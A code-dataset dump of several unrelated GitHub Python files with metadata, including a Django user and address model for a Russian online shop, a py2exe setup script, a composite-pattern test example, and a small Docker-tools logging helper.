},
{
"name": "Dart",
"bytes": "489"
},
{
"name": "Dockerfile",
"bytes": "10981"
},
{
"name": "Eiffel",
"bytes": "375"
},
{
"name": "Elixir",
"bytes": "692"
},
{
"name": "Elm",
"bytes": "487"
},
{
"name": "Emacs Lisp",
"bytes": "411907"
},
{
"name": "Erlang",
"bytes": "487"
},
{
"name": "Forth",
"bytes": "979"
},
{
"name": "FreeMarker",
"bytes": "1017"
},
{
"name": "G-code",
"bytes": "521"
},
{
"name": "GLSL",
"bytes": "512"
},
{
"name": "Genshi",
"bytes": "946"
},
{
"name": "Gherkin",
"bytes": "699"
},
{
"name": "Go",
"bytes": "7312"
},
{
"name": "Groovy",
"bytes": "1080"
},
{
"name": "HTML",
"bytes": "24999718"
},
{
"name": "Haskell",
"bytes": "512"
},
{
"name": "Haxe",
"bytes": "447"
},
{
"name": "HiveQL",
"bytes": "43"
},
{
"name": "Io",
"bytes": "140"
},
{
"name": "JSONiq",
"bytes": "4"
},
{
"name": "Java",
"bytes": "471854"
},
{
"name": "JavaScript",
"bytes": "28075556"
},
{
"name": "Julia",
"bytes": "210"
},
{
"name": "Jupyter Notebook",
"bytes": "73168"
},
{
"name": "LSL",
"bytes": "2080"
},
{
"name": "Lean",
"bytes": "213"
},
{
"name": "Lex",
"bytes": "264449"
},
{
"name": "Liquid",
"bytes": "1883"
},
{
"name": "LiveScript",
"bytes": "5747"
},
{
"name": "Lua",
"bytes": "78382"
},
{
"name": "M4",
"bytes": "1377"
},
{
"name": "MATLAB",
"bytes": "203"
},
{
"name": "Makefile",
"bytes": "269655"
},
{
"name": "Mako",
"bytes": "3614942"
},
{
"name": "Mask",
"bytes": "597"
},
{
"name": "Myghty",
"bytes": "936"
},
{
"name": "Nix",
"bytes": "2212"
},
{
"name": "OCaml",
"bytes": "539"
},
{
"name": "Objective-C",
"bytes": "2672"
},
{
"name": "OpenSCAD",
"bytes": "333"
},
{
"name": "PHP",
"bytes": "662"
},
{
"name": "PLSQL",
"bytes": "31565"
},
{
"name": "PLpgSQL",
"bytes": "6006"
},
{
"name": "Pascal",
"bytes": "1412"
},
{
"name": "Perl",
"bytes": "4327"
},
{
"name": "PigLatin",
"bytes": "371"
},
{
"name": "PowerShell",
"bytes": "3204"
},
{
"name": "Python",
"bytes": "76440000"
},
{
"name": "R",
"bytes": "2445"
},
{
"name": "Roff",
"bytes": "95764"
},
{
"name": "Ruby",
"bytes": "1098"
},
{
"name": "Rust",
"bytes": "495"
},
{
"name": "Scala",
"bytes": "1541"
},
{
"name": "Scheme",
"bytes": "559"
},
{
"name": "Shell",
"bytes": "190718"
},
{
"name": "Smarty",
"bytes": "130"
},
{
"name": "TSQL",
"bytes": "10013"
},
{
"name": "Tcl",
"bytes": "899"
},
{
"name": "TeX",
"bytes": "165743"
},
{
"name": "Thrift",
"bytes": "317058"
},
{
"name": "TypeScript",
"bytes": "1607"
},
{
"name": "VBA",
"bytes": "2884"
},
{
"name": "VBScript",
"bytes": "938"
},
{
"name": "VHDL",
"bytes": "830"
},
{
"name": "Vala",
"bytes": "485"
},
{
"name": "Verilog",
"bytes": "274"
},
{
"name": "Vim Snippet",
"bytes": "226931"
},
{
"name": "XQuery",
"bytes": "114"
},
{
"name": "XSLT",
"bytes": "521413"
},
{
"name": "Yacc",
"bytes": "2133855"
}
],
"symlink_target": ""
} |
import datetime
from django.db import models
from django.contrib.auth.models import AbstractBaseUser
from users.managers import UserManager
class User(AbstractBaseUser):
"""Покупатель"""
STATUS_ADMIN = 0
STATUS_CUSTOMER = 1
STATUS_WHOLESALE = 2
STATUS_FRANCHISEE = 3
STATUS_CHOICES = (
(STATUS_ADMIN, u'Администратор'),
(STATUS_CUSTOMER, u'Розничный покупатель'),
(STATUS_WHOLESALE, u'Оптовый покупатель'),
(STATUS_FRANCHISEE, u'Франчайзи'),
)
email = models.EmailField(u'E-mail', unique=True, db_index=True)
is_active = models.BooleanField(default=False, db_index=True)
title = models.CharField(u'ФИО', max_length=255, blank=True)
phone = models.CharField(u'Телефон', max_length=50, blank=True)
birthday = models.DateField(u'Дата рождения', blank=True, null=True)
status = models.PositiveSmallIntegerField(u'Тип', choices=STATUS_CHOICES, default=STATUS_CUSTOMER,
db_index=True)
created = models.DateTimeField(u'Дата регистрации', default=datetime.datetime.now)
objects = UserManager()
class Meta:
db_table = u'users_user'
verbose_name = u'пользователь'
verbose_name_plural = u'пользователи'
USERNAME_FIELD = 'email'
REQUIRED_FIELDS = ()
def get_full_name(self):
return self.title
def get_short_name(self):
return self.title
@property
def is_staff(self):
return self.status == self.STATUS_ADMIN
@property
def is_customer(self):
return self.status == self.STATUS_CUSTOMER
@property
def is_wholesale(self):
return self.status == self.STATUS_WHOLESALE
@property
def is_franchisee(self):
return self.status == self.STATUS_FRANCHISEE
def show_wholesale(self):
return self.status in (self.STATUS_WHOLESALE, self.STATUS_FRANCHISEE)
def has_perm(self, obj=None):
return True
def has_module_perms(self, app_label):
return True
def save(self, *args, **kwargs):
if self.status == self.STATUS_ADMIN:
self.is_active = True
return super(User, self).save(*args, **kwargs)
class Country(models.Model):
title = models.CharField(u'Название', max_length=50)
class Region(models.Model):
country = models.ForeignKey(Country)
title = models.CharField(u'Название', max_length=255)
class City(models.Model):
region = models.ForeignKey(Region)
title = models.CharField(u'Название', max_length=255)
def __unicode__(self):
return self.title
class Address(models.Model):
user = models.ForeignKey(User, related_name='addresses')
city = models.CharField(u'Город', max_length=255, blank=True)
postal_code = models.CharField(u'Индекс', max_length=6, blank=True)
street = models.CharField(u'Улица', max_length=255, blank=True)
house = models.CharField(u'Дом, корпус, строение', max_length=255, blank=True)
flat = models.CharField(u'Квартира, офис', max_length=255, blank=True)
original_string = models.TextField(u'Адрес со старого сайта', blank=True)
email = models.EmailField(blank=True)
phone = models.CharField(u'Контактный телефон', max_length=255, blank=True)
courier_city = models.ForeignKey('checkout.CourierCity', null=True, blank=True)
receiver_title = models.CharField(u'ФИО получателя', max_length=255)
receiver_phone = models.CharField(u'Телефон получателя', max_length=255, blank=True)
is_deleted = models.BooleanField(u'Удален', default=False)
class Meta:
verbose_name = u'адрес'
verbose_name_plural = u'адреса'
def __unicode__(self):
bits = [self.postal_code, self.city, self.street, self.house, self.flat]
return u', '.join([x for x in bits if x])
class Company(models.Model):
user = models.OneToOneField(User, related_name='company')
title = models.CharField(u'Название', max_length=255, blank=True)
city = models.CharField(u'Город', max_length=255, blank=True)
industry = models.CharField(u'Занятия', max_length=255, blank=True)
phone = models.CharField(u'Телефон', max_length=255)
inn = models.CharField(u'ИНН/КПП', max_length=25, blank=True)
ogrn = models.CharField(u'ОГРН', max_length=15, blank=True)
giro = models.CharField(u'Расчетный счет', max_length=25, blank=True)
juridical_address = models.TextField(u'Юридический адрес', blank=True)
post_address = models.TextField(u'Почтовый адрес', blank=True)
phone = models.CharField(u'Телефон', max_length=255, blank=True)
director = models.CharField(u'Контактное лицо', max_length=255)
class Meta:
verbose_name = u'компания'
verbose_name_plural = u'компания'
def __unicode__(self):
return self.title
| {
"content_hash": "204267273aa7c72ae05e5252bce1f3d6",
"timestamp": "",
"source": "github",
"line_count": 142,
"max_line_length": 102,
"avg_line_length": 33.58450704225352,
"alnum_prop": 0.6777102117844411,
"repo_name": "Lisaveta-K/lisaveta-k.github.io",
"id": "ca65cdecfd79061030b3ae54ab25915efd4a5243",
"size": "5194",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "_site/tomat/apps/users/models.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "159937"
},
{
"name": "HTML",
"bytes": "275262"
},
{
"name": "JavaScript",
"bytes": "34638"
},
{
"name": "Python",
"bytes": "664204"
}
],
"symlink_target": ""
} |
from distutils.core import setup
import py2exe
# Create an executable from a python script
# Use: python setup.py py2exe
setup(console=['passcodes.py']) # Enter name of script
| {
"content_hash": "c9891b6e2f8c0afe5ab97fc6203c07a5",
"timestamp": "",
"source": "github",
"line_count": 7,
"max_line_length": 54,
"avg_line_length": 26.428571428571427,
"alnum_prop": 0.7405405405405405,
"repo_name": "fatty-duck/lib-lockdown",
"id": "4f426d4f2491a54307bad1254111f71b22d9837f",
"size": "185",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "src/setup.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "2917"
}
],
"symlink_target": ""
} |
class Test(object):
def run(self):
raise NotImplementedError("Implement this!")
def add(self, test):
pass
class TestCase(Test):
def run(self):
print "Running test: %s" % self
class TestSuite(Test):
def __init__(self):
self.tests = []
def run(self):
for test in self.tests:
test.run()
def add(self, test):
self.tests.append(test)
def test():
test01 = TestCase()
test02 = TestCase()
test03 = TestCase()
testsuite01 = TestSuite()
testsuite02 = TestSuite()
testsuite03 = TestSuite()
testsuite01.add(test01)
testsuite01.add(test02)
testsuite02.add(test03)
testsuite03.add(testsuite01)
testsuite03.add(testsuite02)
testsuite03.add(test01)
testsuite03.run()
if __name__ == '__main__':
test()
| {
"content_hash": "981f8d600f6c5f44290da8539e8a05cb",
"timestamp": "",
"source": "github",
"line_count": 45,
"max_line_length": 52,
"avg_line_length": 18.622222222222224,
"alnum_prop": 0.5978520286396182,
"repo_name": "pgularski/snippets",
"id": "ba8bb877d00153b6aa7559d470715f1b4c054357",
"size": "896",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "python/design_patterns/composite.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "67595"
}
],
"symlink_target": ""
} |
import logging
from registry import registry_connect
__author__ = 'Joji Vithayathil Johny'
__version__ = '0.0.1'
def set_logger_status(name='pydockertools', level=logging.DEBUG, format_string=None):
"""
Add a stream handler for the given name and level to the logging module.
By default, this logs all pydockertools messages to ``stdout``.
>>> import pydockertools
>>> pydockertools.set_stream_logger('pydockertools.resources', logging.INFO)
:type name: string
:param name: Log name
:type level: int
:param level: Logging level, e.g. ``logging.INFO``
:type format_string: str
:param format_string: Log message format
"""
if format_string is None:
format_string = "%(asctime)s %(name)s [%(levelname)s] %(message)s"
logger = logging.getLogger(name)
logger.setLevel(level)
handler = logging.StreamHandler()
handler.setLevel(level)
formatter = logging.Formatter(format_string)
handler.setFormatter(formatter)
logger.addHandler(handler)
def joke():
return (u'Wenn ist das Nunstfcck git und Slotermeyer? Ja! ... '
u'Beiherhund das Oder die Flipperwaldt gersput.')
| {
"content_hash": "ecb564881597e63258d06426b145a487",
"timestamp": "",
"source": "github",
"line_count": 35,
"max_line_length": 85,
"avg_line_length": 33.6,
"alnum_prop": 0.6811224489795918,
"repo_name": "jojees/pydocker-tools",
"id": "b0f6c39dbffa2b0c624266e0bb92b89739a8194e",
"size": "2312",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "pydockertools/__init__.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "14824"
}
],
"symlink_target": ""
} |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.